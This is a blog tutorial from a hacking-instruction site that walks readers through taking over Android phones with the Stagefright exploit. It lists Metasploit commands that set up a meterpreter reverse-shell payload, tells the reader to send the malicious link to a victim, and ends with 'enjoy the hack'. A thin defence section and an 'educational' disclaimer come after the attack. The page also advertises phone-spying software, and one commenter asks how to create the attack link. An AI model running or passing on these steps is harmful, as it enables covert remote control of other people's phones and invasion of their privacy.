• Write for Us
  • Courses
  • Blog
  • About Us
  • Contact
Hacker Academy
  • Write for Us
  • Courses
  • Blog
  • About Us
  • Contact

    Android

    • Home
    • Android
    • How to hack android phones with a link (Stagefright exploit)

    How to hack android phones with a link (Stagefright exploit)

    • Posted by shubham
    • Categories Android
    • Tags hack android with stagefright exploit, hacking with stagefright exploit, stagefright, Stagefright Exploit, stagefright valnerability

    Today we are going to do a very movie-style stagefright exploit hack. We are going to demonstrate a remote exploit to take control of an android device with a reverse shell. This exploit is commonly known as the stagefright exploit. In this exploit, the victim opens a malicious link, and his phone is automatically hacked just like that. It exploits a vulnerability in android, which exists in version 2.1 to 5.1.1 (lollipop). 

    Table of contents

    • How can a hacker use this Stagefright exploit?
    • Hacking android with stagefright exploit and Kali Linux
      • Step 1: Boot up your Kali Linux.
      • Step 2: Set Metasploit server for using the stagefright exploit
      • Step 3: Exploit the victim having stagefright vulnerability
      • Step 4: Enjoy the hack.
      • How do I protect myself from hackers using this hack?
      • Commonly asked questions about hacking android devices with stagefright exploit:

    How can a hacker use this Stagefright exploit?

     This critical stagefright vulnerability in android was discovered by a cybersecurity researcher at Zimperium. Yes, these are the same guys that made zanti. This stagefright vulnerability is a type of buffer overflow attack. This remote exploit does not require any other human interaction. The hacker sends a malicious file link which when clicked crashes the stagefright library, and the process then restarts with a reverse shell back to the server comprising the machine with the stagefright exploit. And viola the android device is hacked, and the user doesn’t even realize it. 

    So without any further ado let’s start hacking with stagefright exploit. 

    Hacking android with stagefright exploit and Kali Linux

    Step 1: Boot up your Kali Linux.

    Start your Kali Linux machine and open Metasploit.

    hack android with stagefright exploit

    Step 2: Set Metasploit server for using the stagefright exploit

    To set up Metasploit type the following commands in msf console:

    use exploit/android/browser/stagefright_mp4_tx3g_64bit

    set SRVHOST 192.168.182.136 (your IP here)

    set URIPATH /

    set payload linux/armle/meterpreter/reverse_tcp

    set lhost 192.168.182.136 (your IP here)

    set verbose true

    exploit -j

    stagefright exploit

    Step 3: Exploit the victim having stagefright vulnerability

    Now that the exploit is running send the malicious link to the victim.

    In my case, the link is: http://192.168.182.136:8080/

    Note: This attack works only on limited android phones with outdated stock browsers.

    Step 4: Enjoy the hack.

    Once the victim clicks on the link, their android phone will be compromised. And you can control it remotely with the stagefright exploit. Now, do note that this exploit is not that stable and the connection may not persist.

    How do I protect myself from hackers using this hack?

    Check if your device is vulnerable. Use the Norton exploit security app to check if your device is vulnerable.

    — DISABLE MMS AUTO RETRIEVAL: Disable the auto retrieval of multimedia messages.

    — UPDATE YOUR DEVICE: This bug has been long fixed make sure you update your android device so that you are not vulnerable to the stagefright vulnerability.

    — CHANGE YOUR DEVICE: Buy a new device with the latest updates. Do not use outdated devices which haven’t been updated for more than a year.

    — OFFICIAL PLAYSTORE: Only install apps from the official play store. Do not open unknown links and files which you do not trust.

    — INSTALL AN ANTIVIRUS: Install a good antivirus on your android device.

    Commonly asked questions about hacking android devices with stagefright exploit:

    Q1) Does it work on all phones?

    No, only phones with an android version lollipop and below. Nexus devices are especially vulnerable.

    Q2) Is it legal to exploit phones with stagefright exploit?

    No, it is not legal to hack android devices. This is an educational article. Use it for research and other purposes.

    Q3) It’s not working on my kali machine?

    Update Kali Linux and try again. Try repeating all the steps. If you get a specific error, then mention it in the comment section.

    Cocospy Phone Spy

    Tag:hack android with stagefright exploit, hacking with stagefright exploit, stagefright, Stagefright Exploit, stagefright valnerability

    • Share:
    author avatar
    shubham

    Previous post

    How to hack Android device with ADB (Android debugging bridge )
    February 28, 2021

    Next post

    MITM Attack with Zanti - Android MITM
    February 28, 2021

    You may also like

    top 10 skills every hackers must learn
    Top 10 Skills Every Hacker Must Learn
    8 August, 2021
    pexels-markus-spiske-1921326
    Top 10 Programming Languages for Hacking
    26 June, 2021
    pexels-sora-shimazaki-5926382
    Top 10 Hacking Movies of All Time
    26 June, 2021

      6 Comments

    1. Bunny
      March 20, 2021
      Reply

      I want to become a hacker please you teach me I will learn daily in V I want to become a big hacker

    2. Bunny
      March 20, 2021
      Reply

      I want to become a hacker please you teach me I will learn daily in V I want to become a big hacker please teach me ok

    3. Official lat max
      April 9, 2021
      Reply

      Pls I wannna learn hacking
      Pls I need professional hacker to teach me hacking
      09034740560

      • True kid
        August 13, 2021
        Reply

        Please how did you get the link you used, can I use the same link or how do I create my own odd link?

        • shubham
          August 13, 2021
          Reply

          You create it in metasploit

    4. WOMENWHOCODE
      December 13, 2021
      Reply

      Not Found

      The requested URL was not found on this server.

      THIS IS WHAT I KEEP GETTING WHEN PUTTING IN THE URL IN BROWSER USING AN ANDROID VM IN VIRTUALBOX

    Leave A Reply Cancel reply

    Your email address will not be published. Required fields are marked *

    Cocospy Phone Spy
    Cocospy Phone Spy

    Suggested Tools

    [email protected]
    Facebook Twitter Google-plus Pinterest

    Company

    • About Us
    • Contact
    • Write a Guest Post

    Links

    • Privacy
    • Terms

    Support

    • Disclaimer
    • Advertise With Us
    • FAQs

    All rights Reserved 2021 || For any issues contact: [email protected]

    • Privacy
    • Terms